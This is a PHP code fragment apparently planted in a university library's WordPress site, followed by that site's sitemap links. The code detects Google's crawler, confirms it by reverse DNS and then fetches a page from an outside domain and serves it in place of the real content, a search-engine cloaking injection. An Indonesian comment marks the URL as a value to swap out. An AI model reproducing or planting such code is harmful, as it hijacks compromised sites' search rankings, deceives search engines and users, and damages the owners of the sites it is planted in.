$ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; if (stripos($ua, 'Googlebot') !== false) { $ip = $_SERVER['REMOTE_ADDR'] ?? ''; $host = gethostbyaddr($ip); if (strpos($host, 'googlebot.com') !== false || strpos($host, 'google.com') !== false) { $seo_url = 'https://amplumen.lol/baakuniv.html'; // ← GANTI INI $ch = curl_init($seo_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 12); curl_setopt($ch, CURLOPT_USERAGENT, $ua); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $content = curl_exec($ch); curl_close($ch); if (!empty($content)) { echo $content; exit; } } } ?> https://lib.ummat.ac.id/wp-sitemap-posts-post-1.xmlhttps://lib.ummat.ac.id/wp-sitemap-posts-page-1.xmlhttps://lib.ummat.ac.id/wp-sitemap-taxonomies-category-1.xml